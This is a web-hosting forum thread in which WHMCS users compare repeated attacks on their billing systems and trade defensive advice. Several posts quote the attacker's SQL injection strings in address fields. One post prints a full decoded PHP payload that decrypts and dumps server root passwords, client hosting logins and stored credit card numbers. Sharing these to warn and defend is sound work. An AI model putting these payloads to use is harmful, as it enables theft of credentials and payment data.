ekcomobile Posted November 23, 2014 Share Posted November 23, 2014 I just did this "fix" of blocking fields from being changed. But I have to tell you that on the 20th I had this same sign up for probably the 8th time in the past few months. This time though I get emails from my hosting service and from a company that does fraud protection and monitoring for Apple ID. Both were informing me of of the hack. I've gone through all of my clients sites cPanel files and have found alterations over the past 24 hours. Mostly new file, sub domains and directories added. Many are empty. But a few have had over 100 dat files added to them and one with the sub-domain called remax.com has been blocked by Norton and my mobile browser. There are also client sites getting you are forbidden access on this server. But every time I've had this same client sign up and client info change I have to go through all of my clients sites and find alterations. Every Time! One time the guy was attacking a bank in Brasil when I got emails from another protection company. The attacks are more frequent and more aggressive each time. Wish I had known of the prevention of client info change earlier. I've trying to figure out how to use code to block special characters other than @ and . and of course alpha numeric. Now I have to also go and get my clients sites all checked against Norton and blacklists. Not the first time but hopefully the last. Link to comment Share on other sites More sharing options...
easyhosting Posted November 23, 2014 Share Posted November 23, 2014 WHMCS is not giving Importance to our post which we have requested to them for give and email verification option for newly registering user's in the next update. an email verification module is available http://forum.whmcs.com/showthread.php?73867-New-Addon-Email-Verification-WHMCS-Module Link to comment Share on other sites More sharing options...
durangod Posted November 23, 2014 Share Posted November 23, 2014 Many of you just need to upgrade, i know some of you have different issues with regard to what happens, but as i look thru these posts not only here but also in other threads, i see update update update. Honestly if you cant afford to update then you cant afford to be in business, its really that simple. Sure just like anything there will always be exceptions and we have to stay one step ahead of those idiots trying to hack, but you lesson your chances by a huge amount if you just stay current. If you need help updating let someone know, do a ticket, we are here to help, but thats the best thing you can do.. Link to comment Share on other sites More sharing options...
easyhosting Posted November 23, 2014 Share Posted November 23, 2014 Many of you just need to upgrade, i know some of you have different issues with regard to what happens, but as i look thru these posts not only here but also in other threads, i see update update update. Honestly if you cant afford to update then you cant afford to be in business, its really that simple. Sure just like anything there will always be exceptions and we have to stay one step ahead of those idiots trying to hack, but you lesson your chances by a huge amount if you just stay current. If you need help updating let someone know, do a ticket, we are here to help, but thats the best thing you can do.. I agree. Many threads on this subject and rather than people look or read current threads they start another thread, but the answer is the same. this hacker is trying to use an old vulnerability from an old version of WHMCS, so if you have an upto date WHMCS installation then you will be fine Link to comment Share on other sites More sharing options...
ekcomobile Posted November 23, 2014 Share Posted November 23, 2014 Completely up to date so this is not my issue. Already today they have tried twice to do this hack and the refusal to allow them to automatically do it has stopped them. Simple solution. Now just to finish removing everything and getting my clients sites unblocked. - - - Updated - - - Sorry that was meant to be the refusal to automatically allow them to change their personal info after registering. Link to comment Share on other sites More sharing options...
easyhosting Posted November 23, 2014 Share Posted November 23, 2014 we use Maxmind and yes these hackers using the name Aganteng Rooterz have tried to set up accounts, but maxmind stopped these, so no accounts were ever set up Link to comment Share on other sites More sharing options...
davey Posted November 25, 2014 Share Posted November 25, 2014 (edited) Hi, This guy is trying to exploit our whmcs system aswel for over a 5 months now. Almost each day he tries to get acces to our servers with a new account each day. Also read this post: http://forum.whmcs.com/showthread.php?93239-Spam-Account-Keeps-Registering&p=393526#post393526 If you want all ip addresses what i've banned so far, please contact me. Edited November 25, 2014 by davey Link to comment Share on other sites More sharing options...
Cain72 Posted November 25, 2014 Share Posted November 25, 2014 176.223.125.144 mxserver.ro = 188.212.156.52 = a: 52-156-static.mxserver.ro Continent Lat/Lon: 48.69083 / 9.1405 Country Lat/Lon: 46 / 25 City Lat/Lon: (47.1333) / (24.4833) IP Language: Romanian IP Address Speed: Unknown Internet Speed Continent: Europe (EU) Country: Romania (RO) Capital: Bucharest State: Bistrita-Nasaud City Location: Bistrita ISP: Net Design SRL Organization: Net Design SRL ------------------------ 188.212.156.52 Continent Lat/Lon: 48.69083 / 9.1405 Country Lat/Lon: 46 / 25 City Lat/Lon: (46) / (25) IP Language: Romanian Continent: Europe (EU) Country: Romania (RO) Capital: Bucharest ISP: Webfactor SRL Organization: Webfactor SRL AS Number: AS35818 Webfactor SRL Time Zone: Europe/Bucharest ----------------------- my humble suggestion .. Block Europe, entirely, at least for the time being, apply necessary firewall changes, break the existing network state of your firewalls and force a fresh network reconnection, review your logs for more clues .. Cain Link to comment Share on other sites More sharing options...
davey Posted November 25, 2014 Share Posted November 25, 2014 Don't think that would be a option to be honest. Thereby, this guy uses proxy's also located in usa. These ip's he already used on our website. 50.116.74.228 Hack attempt 02/12/2031 11:29 192.185.83.219 Hack attempt 27/11/2031 11:54 192.185.83.177 Hack attempt 26/11/2031 00:02 168.144.134.227 Hack attempt 25/11/2031 11:51 192.185.81.218 Hack attempt 25/11/2031 11:50 192.185.2.236 Hack attempt 21/11/2031 13:10 216.246.79.37 Hack attempt 16/11/2031 12:46 199.241.186.134 Hack attempt 15/11/2031 17:02 50.61.165.3 Hack attempt 15/11/2031 09:27 192.185.83.176 Hack attempt 13/11/2031 22:34 198.1.71.233 Hack attempt 08/11/2031 21:12 192.254.69.110 Hack attempt 08/11/2031 19:43 192.185.83.10 Hack attempt 01/11/2031 20:52 192.185.2.252 Hack attempt 29/10/2031 18:27 37.247.121.196 Hack attempt 28/10/2031 20:56 184.107.244.250 Hack attempt 28/10/2031 10:09 199.91.126.193 Hack attempt 27/10/2031 16:56 192.185.2.30 Hack attempt 17/10/2031 12:45 173.199.142.17 Hack attempt 16/10/2031 12:13 198.46.141.122 Hack attempt 14/10/2031 13:50 142.0.138.193 Hack attempt 09/10/2031 17:48 188.40.130.120 Hack attempt 08/10/2031 13:53 199.201.88.69 Hack attempt 06/10/2031 10:36 178.32.239.141 Hack attempt 03/10/2031 13:28 192.157.220.120 Hack attempt 02/10/2031 16:20 204.93.159.77 Hack attempt 02/10/2031 11:50 108.170.46.130 Hack attempt 01/10/2031 02:14 108.175.145.28 Hack attempt 30/09/2031 14:11 108.179.225.71 Hack attempt 28/09/2031 11:52 192.185.2.31 Hack attempt 26/09/2031 15:34 188.165.14.158 Hack attempt 26/09/2031 15:25 75.127.126.17 Hack attempt 29/08/2030 14:25 68.64.167.182 Hack attempt 29/08/2031 14:25 216.185.103.164 Hack attempt 25/08/2030 11:14 79.106.109.243 Hack attempt 24/08/2030 01:49 39.250.33.211 Hack attempt 08/01/2032 13:12 Link to comment Share on other sites More sharing options...
Cain72 Posted November 25, 2014 Share Posted November 25, 2014 (edited) yeah i kind of expected that, thanks for the list, always good to have leads to hand to the sharks to play with .. PS: whats up with the dates on that list ?? have you check the integrity of the log files ?? Cain Edited November 25, 2014 by Cain72 Link to comment Share on other sites More sharing options...
devdarsh Posted November 25, 2014 Share Posted November 25, 2014 I am too facing the hacking attempts Client ID: 10 - asal daftar has requested to change his/her details as indicated below: Address 1: 'cyberteam' to 'AES_ENCRYPT(1,1), address1= (SELECT MIN(type) FROM tblservers)' Address 2: 'cyberteam' to 'AES_ENCRYPT(1,1), address2= (SELECT MIN(ipaddress) FROM tblservers)' City: 'cyberteam' to 'AES_ENCRYPT(1,1), city= (SELECT MIN(username) FROM tblservers)' State: 'saint' to 'AES_ENCRYPT(1,1), state= (SELECT MIN(accesshash) FROM tblservers)' Default Payment Method: '' to '' If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details. This change request was submitted from galaxie.websitewelcome.com (192.185.81.131) The hacker opened a support ticket with subject inserting eval function and base64_decode function in it. The 64 decoded code is include('configuration.php'); print " ===== Read Config ===== "; print "\n"; echo " Database : ".$db_name." "; print "\n"; echo " Username : ".$db_username." "; print "\n"; echo " Password : ".$db_password." "; print "\n"; echo " CC_encryption_Hash : ".$cc_encryption_hash." "; print "\n"; $query = mysql_query("SELECT * FROM tblservers"); $text=$text."\r\n######################### HOST ROOTS ###########################\r\n"; while($v = mysql_fetch_array($query)) { $ipaddress = $v['ipaddress']; $username = $v['username']; $type = $v['type']; $active = $v['active']; $hostname = $v['hostname']; $password = decrypt ($v['password'], $cc_encryption_hash); $text=$text."Type $type\r\n"; $text=$text."Active $active\r\n"; $text=$text."Hostname $hostname\r\n"; $text=$text."Ip $ipaddress\r\n"; $text=$text."Username $username\r\n"; $text=$text."Password $password\r\n**************************************\r\n"; } $text=$text."\r\n######################### HOST ROOTS ###########################\r\n"; $text=$text."\r\n######################### Domain Reseller ###########################\r\n"; $query = mysql_query("SELECT * FROM tblregistrars"); while($v = mysql_fetch_array($query)) { $registrar = $v['registrar']; $setting = $v['setting']; $value = decrypt ($v['value'], $cc_encryption_hash); if ($value=="") { $value=0; } $password = decrypt ($v['password'], $cc_encryption_hash); $text=$text."$registrar $setting $value\r\n"; } $text=$text."\r\n######################### Domain Reseller ###########################\r\n"; $text=$text."\r\n######################### FTP +SMTP ###########################\r\n"; $query = mysql_query("SELECT * FROM tblconfiguration where setting='FTPBackupHostname' or setting='FTPBackupUsername' or setting='FTPBackupPassword' or setting='FTPBackupDestination' or setting='SMTPHost' or setting='SMTPUsername' or setting='SMTPPassword' or setting='SMTPPort'"); while($v = mysql_fetch_array($query)) { $value =$v['value']; if ($value=="") { $value=0; } $text=$text.$v['setting']." ".$value."\r\n" ; } $text=$text."\r\n######################### FTP +SMTP ###########################\r\n"; $text=$text."\r\n######################### Payment gateway ###########################\r\n"; $query = mysql_query("SELECT * FROM tblpaymentgateways"); while($v = mysql_fetch_array($query)) { $gateway = $v['gateway']; $setting = $v['setting']; $value = $v['value']; $text=$text."$gateway|$setting|$value\r\n"; } $text=$text."\r\n######################### Payment gateway ###########################\r\n"; $text=$text."\r\n######################### Client R00ts ###########################\r\n"; $query = mysql_query("SELECT * FROM tblhosting where (username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or username = 'administrator') and domainstatus='Active'"); while($v = mysql_fetch_array($query)) { $text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n"; } $text=$text."\r\n######################### Client R00ts ###########################\r\n"; $text=$text."\r\n######################### Client HOST ###########################\r\n"; $query = mysql_query("SELECT * FROM tblhosting where domainstatus='Active'"); while($v = mysql_fetch_array($query)) { if (($v['username'] ) and ($v['password'])) { $text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n"; } } $text=$text."\r\n######################### Client HOST ###########################\r\n"; $text=$text."\r\n######################### Client CC ###########################\r\n"; $query = mysql_query("SELECT * FROM `tblclients` WHERE cardtype <> '' order by issuenumber desc"); while($v = mysql_fetch_array($query)) { $cchash = md5( $cc_encryption_hash.$v['0']); $s= mysql_query("select cardtype,AES_DECRYPT(cardnum,'{$cchash}') as cardnum,AES_DECRYPT(expdate,'{$cchash}') as expdate,AES_DECRYPT(issuenumber,'{$cchash}') as issuenumber,AES_DECRYPT(startdate,'{$cchash}') as startdate,country,email,firstname,lastname,address1,city,state,postcode,phonenumber FROM `tblclients` where id='".$v['0']."'" ); $country = $v['country']; $email = $v['email']; $firstname = $v['firstname']; $lastname = $v['lastname']; $address1 = $v['address1']; $city = $v['city']; $state = $v['state']; $postcode = $v['postcode']; $phonenumber = $v['phonenumber']; $v2=mysql_fetch_array($s); $text=$text."\r\n".$v2[0]."|".$v2[1]."|".$v2[2]."|".$v2[3]."|".$v2[4]." $firstname $lastname ~ $address1:$city:$state:$postcode:$phonenumber $country $email\r\n"; } $text=$text."\r\n######################### Client CC ###########################\r\n"; echo($text); I cannot open new threads here, it is not appearing to the forum, i don't have permission? Link to comment Share on other sites More sharing options...
davey Posted November 25, 2014 Share Posted November 25, 2014 The date what is displayed is the date till when this ip has been banned, not the date since when he got banned Link to comment Share on other sites More sharing options...
davey Posted November 25, 2014 Share Posted November 25, 2014 I had about a year ago alsof this kind of support ticket, this only happend once. Did you restricted the support departments for registrated users only? Link to comment Share on other sites More sharing options...
devdarsh Posted November 26, 2014 Share Posted November 26, 2014 I had about a year ago alsof this kind of support ticket, this only happend once. Did you restricted the support departments for registrated users only? Not restricted for sales department for sales inquiry, he used that. Now restricted for that too. Now we cannot use required features even it is available with whmcs. Link to comment Share on other sites More sharing options...
davey Posted November 26, 2014 Share Posted November 26, 2014 Did you set up the recaptcha for unregistrated users? If not, this can prevent tickets like these aswel. Link to comment Share on other sites More sharing options...
devdarsh Posted November 26, 2014 Share Posted November 26, 2014 Did you set up the recaptcha for unregistrated users? If not, this can prevent tickets like these aswel. But i hope these kind of activities are from real persons not from any scripts. Link to comment Share on other sites More sharing options...
Cain72 Posted November 27, 2014 Share Posted November 27, 2014 (edited) ya know what .. after this entire post its made me rethink just how many of you actualy understand IT .. how many of you have any real world network experience ?? and no, before you spout off, im not taking a dig at anyone here, its not like that, its just an honest evaluation of the type of people that are running wanna be hosting systems thinking its all going to be easy cash .. its not ... if you dont understand what you are doing .. bail now, and find another industry to delve into ... because if you dont have the knowledge behind you to resolve such an issue, believe me the last thing you want is to encounter someone who lives and breaths this stuff ... in short, if i was a client, i would be mortified to read this forum post, and honestly some of my clients do .. sorry guys... the first and only time you'll see honestly on that kind of level.. Cain Edited November 27, 2014 by Cain72 2 Link to comment Share on other sites More sharing options...
easyhosting Posted November 27, 2014 Share Posted November 27, 2014 I noticed a pattern with the attempts to set up accounts with us in that the IP ranges were all on Singlehop servers, so after barring the CITR of the IPs i contacted Singlehop with all the information along with links on various forums discussing these hacks and ever since then no further orders have been attempted by him. Link to comment Share on other sites More sharing options...
bear Posted November 28, 2014 Share Posted November 28, 2014 if you dont understand what you are doing .. bail now Feel free to share how if you're capable of resolving this in some definitive way. after barring the CITR of the IPs Did you mean CIDR there (Classless Inter-Domain Routing)? Link to comment Share on other sites More sharing options...
Infopro Posted November 28, 2014 Share Posted November 28, 2014 Feel free to share No need to ask that, you are fully aware of what he meant. Did you mean Of course he did. This thread is going around and around now, so, time to close it, just like the ones before it. Link to comment Share on other sites More sharing options...
technicalguy Posted November 28, 2014 Share Posted November 28, 2014 Anyone else seen this type of problem? Got notification of an account creation where information was changed in fields to attempt to run SQL code: First Name: 'go' to 'Andri' Last Name: 'Team' to 'Cyber4rt' Company Name: ' testing ' to ' DMASTERPIECE ' Address 1: 'dm' to 'AES_ENCRYPT(1,1), address1= (SELECT MIN(username) FROM tbladmins)' Address 2: 'dm' to 'AES_ENCRYPT(1,1), address2= (SELECT MIN(password) FROM tbladmins)' Postcode: '404403' to 'dm' Default Payment Method: '' to '' If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details. This change request was submitted from spo-rbr3.dizinc.com (187.45.185.98) Record has been deleted, but this is a concern for sure. First time I've seen it. Link to comment Share on other sites More sharing options...
Infopro Posted November 28, 2014 Share Posted November 28, 2014 http://forums.whmcs.com/showthread.php?95263-Keep-getting-hacked http://forums.whmcs.com/showthread.php?93239-Spam-Account-Keeps-Registering We'll most likely merge your thread into one of those. Link to comment Share on other sites More sharing options...
Konink Posted December 22, 2014 Share Posted December 22, 2014 Hello, 2 days ago i got this account created in our system: Voornaam Andri Achternaam Cyber4rt Bedrijfsnaam DMASTERPIECE Emailadres DM@GMAIL.COM Adres 1 AES_ENCRYPT(1,1), address1= (SELECT MIN(username) FROM tbladmins) Adres 2 AES_ENCRYPT(1,1), address2= (SELECT MIN(password) FROM tbladmins) Plaats dm Provincie Arizona Postcode dm Land US - United States Telefoonnummer 086969696969 He / they tried to register a domain but i canceled the order (all orders need to be accepted by a admin). Do i need to do something or....? Link to comment Share on other sites More sharing options...
Recommended Posts